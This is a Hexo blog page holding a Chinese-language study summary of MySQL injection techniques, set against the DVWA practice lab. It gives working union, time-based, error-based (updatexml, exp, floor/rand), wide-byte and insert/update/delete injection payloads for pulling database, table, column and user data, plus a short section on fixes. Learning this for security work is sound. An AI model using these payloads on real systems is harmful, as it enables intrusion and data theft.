<!DOCTYPE html>



  


<html class="theme-next muse use-motion" lang="zh-Hans">
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="Web安全,Mysql,">










<meta name="description" content="Mysql的一些基本操作命令 创建数据库：create database XXX; 查看数据库：show databases; 切换数据库：use XXX; 删除数据库：drop database XXX; 创建数据表： 123456create table teacher(id int(4) not null primary key auto_increment,name char(20) n">
<meta name="keywords" content="Web安全,Mysql">
<meta property="og:type" content="article">
<meta property="og:title" content="SQL注入总结">
<meta property="og:url" content="http://yoursite.com/2019/06/27/SQL注入总结/index.html">
<meta property="og:site_name" content="Chen&#39;s Bolg">
<meta property="og:description" content="Mysql的一些基本操作命令 创建数据库：create database XXX; 查看数据库：show databases; 切换数据库：use XXX; 删除数据库：drop database XXX; 创建数据表： 123456create table teacher(id int(4) not null primary key auto_increment,name char(20) n">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="http://yoursite.com/2019/06/27/SQL注入总结/1.png">
<meta property="og:image" content="http://yoursite.com/2019/06/27/SQL注入总结/2.png">
<meta property="og:image" content="http://yoursite.com/2019/06/27/SQL注入总结/3.jpg">
<meta property="og:image" content="http://yoursite.com/2019/06/27/SQL注入总结/4.jpg">
<meta property="og:image" content="http://yoursite.com/2019/06/27/SQL注入总结/5.jpg">
<meta property="og:image" content="http://yoursite.com/2019/06/27/SQL注入总结/6.jpg">
<meta property="og:updated_time" content="2019-08-29T06:57:53.116Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="SQL注入总结">
<meta name="twitter:description" content="Mysql的一些基本操作命令 创建数据库：create database XXX; 查看数据库：show databases; 切换数据库：use XXX; 删除数据库：drop database XXX; 创建数据表： 123456create table teacher(id int(4) not null primary key auto_increment,name char(20) n">
<meta name="twitter:image" content="http://yoursite.com/2019/06/27/SQL注入总结/1.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2019/06/27/SQL注入总结/">





  <title>SQL注入总结 | Chen's Bolg</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Chen's Bolg</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br>
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            归档
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br>
            
            搜索
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off" placeholder="搜索..." spellcheck="false" type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2019/06/27/SQL注入总结/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Chen DY">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/images/avatar.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Chen's Bolg">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">SQL注入总结</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2019-06-27T14:23:53+08:00">
                2019-06-27
              </time>
            

            

            
          </span>

          
            <span class="post-category">
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/安全/" itemprop="url" rel="index">
                    <span itemprop="name">安全</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          

          
            <div class="post-wordcount">
              
                
                <span class="post-meta-item-icon">
                  <i class="fa fa-file-word-o"></i>
                </span>
                
                  <span class="post-meta-item-text">字数统计&#58;</span>
                
                <span title="字数统计">
                  1.6k字
                </span>
              

              
                <span class="post-meta-divider">|</span>
              

              
                <span class="post-meta-item-icon">
                  <i class="fa fa-clock-o"></i>
                </span>
                
                  <span class="post-meta-item-text">阅读时长 &asymp;</span>
                
                <span title="阅读时长">
                  6分钟
                </span>
              
            </div>
          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h2 id="mysql的一些基本操作命令"><a class="markdownIt-Anchor" href="#mysql的一些基本操作命令"></a> Mysql的一些基本操作命令</h2>
<p>创建数据库：<code>create database XXX;</code><br>
查看数据库：<code>show databases;</code><br>
切换数据库：<code>use XXX;</code><br>
删除数据库：<code>drop database XXX;</code></p>
<p>创建数据表：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">create table teacher(</span><br><span class="line">id int(4) not null primary key auto_increment,</span><br><span class="line">name char(20) not null,</span><br><span class="line">sex char(10) not null,</span><br><span class="line">addr char(20) not null</span><br><span class="line">);</span><br></pre></td></tr></table></figure>
<p>查看数据表：<code>show tables</code><br>
插入数据表：<code>insert into teacher(name,sex,addr) values('leo','male','hangzhou');</code><br>
查询数据表：<code>select * from teacher;</code><br>
查看表的结构：<code>desc XX;</code><br>
更新数据：<code>update teacher set name=&quot;X&quot; where id=X;</code><br>
删除数据：<code>delete from teacher where name=&quot;X&quot;;</code><br>
order by用于排序：<code>select information from table order by X ASC/DESC;</code><br>
union可以用来连接两个信息，即增加一项select</p>
<p>LIMIT用法：<code>SELECT * FROM table LIMIT offset, rows</code><br>
第一个数字指的是起始行，第二数字指的是获取的行数！</p>
<h2 id="一些常用的数据库查询命令"><a class="markdownIt-Anchor" href="#一些常用的数据库查询命令"></a> 一些常用的数据库查询命令</h2>
<p>1.当前数据库的所有表<br>
<code>select table_name from information_schema.TABLES where TABLE_SCHEMA=database();</code><br>
2.获取表中的所有列的名字<br>
<code>select column_name from information_schema.columns where table_name='表名'</code></p>
<h2 id="判断时字符串注入还是整型注入"><a class="markdownIt-Anchor" href="#判断时字符串注入还是整型注入"></a> 判断时字符串注入还是整型注入</h2>
<p>1.当加单引号进行闭合后，会报错或者无内容显示：<br>
<code>select * from table where id=3’</code><br>
2.当不用单引号闭合，并且在后面加条件会按照条件的逻辑顺序显示，则判断为整型注入<br>
<code>select * from table where id=3 and 1=1</code><br>
不满足以上两点就时字符串注入，其特征有以下几点：<br>
1.当用单引号闭合后还是会报错，因为闭合后单引号个数不匹配：<br>
<code>select * from table where name=’admin’’</code><br>
2.需要对后面的内容进行注释，注释符号为-- (后面有个空格)	#</p>
<h2 id="延时注入"><a class="markdownIt-Anchor" href="#延时注入"></a> 延时注入</h2>
<p>延时注入主要用于不显示错误信息的情况下对数据库名字，表的名字，列的名字进行显示的一种方法。<br>
<code>if(ascii(subtring(&quot;hello&quot;,1,1))=104,sleep(5),0);</code><br>
可以看到，取出&quot;hello&quot;里的第一个字符串，也就是&quot;h&quot;,判断他的ascii码是否为104(&quot;h&quot;的ascii码为104),如果是则延时5秒，反之不延时。同样，我们可以在substring函数里面写SQL语句，提取出我们所要查的表名、列名，再用延时猜解出来。</p>
<h2 id="联合注入"><a class="markdownIt-Anchor" href="#联合注入"></a> 联合注入</h2>
<p>首先可以通过order by来试探出总共有多少个字段<br>
<code>http://rushrush.com/DVWA/vulnerabilities/sqli/?id=1 order by 1</code></p>
<p>还可以通过union select查看当前数据库的某些表<br>
<code>http://rushrush.com/DVWA/vulnerabilities/sqli/?id=1 union select 1,database(),3 LIMIT 1,1</code></p>
<p>不过这种情况不适合用于盲注的场景，因为没有输出反馈</p>
<h2 id="别名"><a class="markdownIt-Anchor" href="#别名"></a> 别名</h2>
<p>在查询数据库的时候可以给列的名字取一个别名，以下两张图为示例：<br>
<strong><img src="/2019/06/27/SQL注入总结/1.png"></strong><br>
下图中用了’as’作为别名显示的字符</p>
<img src="/2019/06/27/SQL注入总结/2.png">
<p>其中‘as’可写可不写</p>
<h2 id="mysql之bug注入"><a class="markdownIt-Anchor" href="#mysql之bug注入"></a> Mysql之bug注入</h2>
<p>利用数据库的BUG进行利用，看输出的报错信息，因为报错的信息中包含了我们想要获取的信息。<br>
只要是count(),rand,group by三个连用就会造成BUG报错（一般表中的数据需要三条以上），如下代码<br>
<code>select concat(floor(rand(0)*2),(select database())) as x,count(1) from student group by x;</code><br>
就会在报错中显示数据库的名字！</p>
<h2 id="mysql注入之函数报错"><a class="markdownIt-Anchor" href="#mysql注入之函数报错"></a> Mysql注入之函数报错</h2>
<p>有许多函数可以利用，如updatexml, exp, geometrycollection, polygon, multipoint, multilinestring, multipolygon</p>
<p>通过UpdateXml报错，注入语句如下：<br>
<code>&amp; 1=(updatexml(1,concat(0x3a,(select user())),1))</code></p>
<p>通过exp报错，注入的语句如下：<br>
<code>&amp; exp(~(select * from (select user()) a))</code></p>
<p>通过GeometryCollection()报错，注入语句如下：<br>
<code>&amp; geometrycollection((select * from(select * from(select user())a)b))</code><br>
后两句会因为版本问题失效。。。</p>
<h2 id="mysql注入的修补"><a class="markdownIt-Anchor" href="#mysql注入的修补"></a> Mysql注入的修补</h2>
<p>对于字符串的修补，在PHP程序中，用addslashes()函数，将符号包括用来闭合的单引号转义，即在符号前面加一个‘\’</p>
<p>对于int型的数据，可以在获取过程中对其加0，若输入是字符串则会自动转型成int，避免了注入的威胁。因为若输入一个字符串，在转型过程中只会保留第一个数字字符而舍去后面的字符。</p>
<p>还可以通过搜索输入字符串中是否存在像“select”&quot;from&quot;等的关键词，将关键词转型，则可以实现注入修补</p>
<h2 id="宽字节注入"><a class="markdownIt-Anchor" href="#宽字节注入"></a> 宽字节注入</h2>
<p>在前面可以看到，通过用转义来实现对Mysql的修补，然而通过利用宽字节可以实现恢复单引号闭合。</p>
<p>大家都知道%df’ 被PHP转义（开启GPC、用addslashes函数，或者icov等），单引号被加上反斜杠\，变成了 %df\’，其中\的十六进制是 %5C ，那么现在 %df\’ =%df%5c%27，如果程序的默认字符集是GBK等宽字节字符集，则MySQL用GBK的编码时，会认为 %df%5c 是一个宽字符，也就是縗，也就是说：%df\’ = %df%5c%27=縗’，有了单引号就好注入了。</p>
<p>[宽字符注入详解](<a href="https://blog.csdn.net/helloc0de/article/details/76180190" target="_blank" rel="noopener">https://blog.csdn.net/helloc0de/article/details/76180190</a> “宽字符”)</p>
<h2 id="insertupdatedelete注入"><a class="markdownIt-Anchor" href="#insertupdatedelete注入"></a> insert,update,delete注入</h2>
<p>三者的区别在于其注入的那句程序是insert,update还是delete<br>
三者都支持报错注入</p>
<h3 id="insert注入"><a class="markdownIt-Anchor" href="#insert注入"></a> insert注入</h3>
<p>一个insert注入的例子：<br>
1.确认是否存在注入<br>
2.获取数据库名：<br>
<code>or updatexml('',concat(0x7e,(SELECT DATABASE())),0x7e) or</code></p>
<img src="/2019/06/27/SQL注入总结/3.jpg">
<p>3.获取表名：<br>
<code>or updatexml('',concat(0x7e,(SELECT concat(table_name) FROM information_schema.tables WHERE table_schema=database() limit 2,1)),0x7e)</code></p>
<img src="/2019/06/27/SQL注入总结/4.jpg">
<p>4.获取字段名：<br>
<code>or updatexml('',concat(0x7e,(SELECT concat(column_name) FROM information_schema.columns WHERE table_name='users' limit 0,1)),0x7e)</code></p>
<img src="/2019/06/27/SQL注入总结/5.jpg">
<p>5.获取数据<br>
<code>or updatexml('',concat(0x7e,(SELECT concat_ws(':',user_id,first_name,last_name) FROM users limit 0,1)),0x7e)</code></p>
<img src="/2019/06/27/SQL注入总结/6.jpg">
<p>如果是inset一般要增加右括号，因为根据insert的语句，闭合括号再对口面部分进行注释可以实现注入。</p>
<h3 id="delete注入"><a class="markdownIt-Anchor" href="#delete注入"></a> delete注入</h3>
<p>delete注入部分支持布尔注入和延时注入和报错注入</p>
<p>延时注入的一个语句范例：<br>
<code>delete from users where user_id=1 and sleep(if(database()='dvwa',5,1));</code><br>
经过上述语句可以用来确定一些信息，而且不会执行delete，即不会删除数据库中的条目</p>
<h3 id="update注入"><a class="markdownIt-Anchor" href="#update注入"></a> update注入</h3>
<p>update同理只是将操作数据库的命令变成了update，下面是一个例子：<br>
<code>update teacher set name=&quot;Gou&quot; where id=1 and sleep(if(database()='test',5,1));</code></p>
<h2 id="mysql注入经常用到的函数"><a class="markdownIt-Anchor" href="#mysql注入经常用到的函数"></a> Mysql注入经常用到的函数</h2>
<p>1.HEX()函数，能够将字符或者数字转成十六进制<br>
2.ASCII()函数和ORD()，将字符转成对应ASCII表上的数字，区别在于ord能进行多字节的字符处理<br>
3.char()函数，能从数字还原出对应的ASCII码</p>
<p><a href="https://www.jianshu.com/p/93924686345e" target="_blank" rel="noopener">Mysql注入常用函数</a></p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/Web安全/" rel="tag"><i class="fa fa-tag"></i> Web安全</a>
          
            <a href="/tags/Mysql/" rel="tag"><i class="fa fa-tag"></i> Mysql</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2018/11/14/机器学习安全论文阅读笔记/" rel="next" title="机器学习安全论文阅读笔记">
                <i class="fa fa-chevron-left"></i> 机器学习安全论文阅读笔记
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/06/30/XSS跨站脚本攻击/" rel="prev" title="XSS跨站脚本攻击">
                XSS跨站脚本攻击 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image" src="/images/avatar.jpg" alt="Chen DY">
            
              <p class="site-author-name" itemprop="name">Chen DY</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">14</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">3</span>
                  <span class="site-state-item-name">分类</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">15</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#mysql的一些基本操作命令"><span class="nav-number">1.</span> <span class="nav-text"> Mysql的一些基本操作命令</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#一些常用的数据库查询命令"><span class="nav-number">2.</span> <span class="nav-text"> 一些常用的数据库查询命令</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#判断时字符串注入还是整型注入"><span class="nav-number">3.</span> <span class="nav-text"> 判断时字符串注入还是整型注入</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#延时注入"><span class="nav-number">4.</span> <span class="nav-text"> 延时注入</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#联合注入"><span class="nav-number">5.</span> <span class="nav-text"> 联合注入</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#别名"><span class="nav-number">6.</span> <span class="nav-text"> 别名</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#mysql之bug注入"><span class="nav-number">7.</span> <span class="nav-text"> Mysql之bug注入</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#mysql注入之函数报错"><span class="nav-number">8.</span> <span class="nav-text"> Mysql注入之函数报错</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#mysql注入的修补"><span class="nav-number">9.</span> <span class="nav-text"> Mysql注入的修补</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#宽字节注入"><span class="nav-number">10.</span> <span class="nav-text"> 宽字节注入</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#insertupdatedelete注入"><span class="nav-number">11.</span> <span class="nav-text"> insert,update,delete注入</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#insert注入"><span class="nav-number">11.1.</span> <span class="nav-text"> insert注入</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#delete注入"><span class="nav-number">11.2.</span> <span class="nav-text"> delete注入</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#update注入"><span class="nav-number">11.3.</span> <span class="nav-text"> update注入</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#mysql注入经常用到的函数"><span class="nav-number">12.</span> <span class="nav-text"> Mysql注入经常用到的函数</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-[object Object]"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Chen DY</span>

  
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-area-chart"></i>
    </span>
    
      <span class="post-meta-item-text">Site words total count&#58;</span>
    
    <span title="Site words total count">26.4k</span>
  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>








        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  











  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  

  
  
    <script type="text/javascript" src="/lib/canvas-nest/canvas-nest.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
